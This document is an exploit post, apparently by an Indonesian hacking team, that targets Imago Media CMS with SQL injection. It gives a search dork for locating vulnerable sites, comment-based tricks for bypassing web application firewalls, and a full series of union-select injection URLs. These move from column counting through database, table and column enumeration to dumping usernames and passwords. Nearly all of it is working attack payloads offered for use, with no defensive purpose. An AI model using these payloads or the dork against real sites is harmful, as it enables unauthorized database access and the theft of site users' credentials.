// Author : Zbyte
// Team : K33P-S1L3NT
// Notif : Ternate Lab Pentesting
// page : https://www.facebook.com/loading.gov
// channel : https://www.youtube.com/channel/UChFMZ01R8Z1mhh2tWc-BddQ
// Grets : QueenAisyah | geek_Defcon | kazutto_kun | s1puT | Badaki | 1!0N7!N | i.am_geek | Admiral | Kopral
// CMS : http://imagomedia.co.id/
// DORK : inurl:/hal-visi-misi ext:html
// Admin page : site.com/user/index.php or site.com/admin/
// Special : Overload Team | Cyber Team Cirebon | Mr.Trouble5hooting
// Demo : http://imagomedia.co.id/notif.php
+ IMAGO MEDIA CMS SQL INJECTION + -----------------------------
// Author : Zbyte
// Team : K33P-S1L3NT
// Notif : Ternate Lab Pentesting
// page : https://www.facebook.com/loading.gov
// channel : https://www.youtube.com/channel/UChFMZ01R8Z1mhh2tWc-BddQ
// Grets : QueenAisyah | geek_Defcon | kazutto_kun | s1puT | Badaki | 1!0N7!N | i.am_geek | Admiral
// CMS : http://imagomedia.co.id/
// DORK : inurl:/hal-visi-misi ext:html
// Admin page : site.com/user/index.php or site.com/admin/
// Special : Overload Team | Cyber Team Cirebon | Mr.Trouble5hooting
// Demo : http://imagomedia.co.id/notif.php Description =========== ###############################################################
( string ) code ( ' ) <= blank or not output reload image <= vuln
( bug SQL INJECTION )
( +--+ ) <= magic code /*!union*/+/*!select*/ <= code for bypass WAF 406 not acceptable /*!12345union*/+/*!12345select*/ <= code for bypass WAF 403 forbidden number magic found on number ( 9 ) ( and false ) <= tricks for open magic number ( version() ) <= code for cek version database ( database() ) <= code for cek database name code for displays table names ------------------------------ group_concat(table_name) from+information_schema.tables+where+table_schema=database() code for Bypass WAF displays table names -------------------- group_concat(/*!table_name*/) from+information_schema./*!tables*/ where /*!table_schema*/=database() code for displays column names ----------------------------- group_concat(column_name) from+information_schema.columns+where+table_name=0xtablename code for Byapass WAF displays column names ----------------------------------------- group_concat(/*!column_name*/) from information_schema./*!columns*/ where /*!table_name*/=0x7461626c656d616e6573 <= HexEncoding ( tablenames ) code for displays username & password -------------------------------------- group_concat(username,0x3a,pswd,0x3a,status) from+tablemanes ############################################################### Proof of Concept ----------------
site.com/hal-visi-misi.html <= default site.com/hal-visi-misi'.html
site.com/hal-visi-misi' order by 10+--+.html site.com/hal-visi-misi' union+select+1,2,3,4,5,6,7,8,9,10+--+.html site.com/hal-visi-misi' /*!union*/+/*!select*/+1,2,3,4,5,6,7,8,9,10+--+.html site.com/hal-visi-misi' /*!12345union*/+/*!12345select*/+1,2,3,4,5,6,7,8,9,10+--+.html site.com/hal-visi-misi' and false /*!12345union*/+/*12345select*/+1,2,3,4,5,6,7,8,9,10+--+.html site.com/hal-visi-misi' and false /*!12345union*/+/*!12345select*/+1,2,3,4,5,6,7,8,9,10+--+.html <= site.com/hal-visi-misi' and false /*!12345union*/+/*!12345select*/+1,2,3,4,5,6,7,8,version(),10+--+.html site.com/hal-visi-misi' and false /*!12345union*/+/*!12345select*/+1,2,3,4,5,6,7,8,database(),10+--+.html site.com/hal-visi-misi' and false /*!12345union*/+/*!12345select*/+1,2,3,4,5,6,7,8,group_concat(/*!table_name*/),10+from+information_schema./*!tables*/ where /*!table_schema*/=database()+--+.html site.com/hal-visi-misi' union+select+1,2,3,4,5,6,7,8,group_concat(/*!column_name*/),10+from information_schema./*!columns*/ where /*!table_name*/=0x7461626c656d616e6573+--+.html site.com/hal-visi-misi' union+select+1,2,3,4,5,6,7,8,group_concat(username,0x3a,pswd,0x3a,status),10+from+tablemanes+--+.html
Selasa, 07 Maret 2017
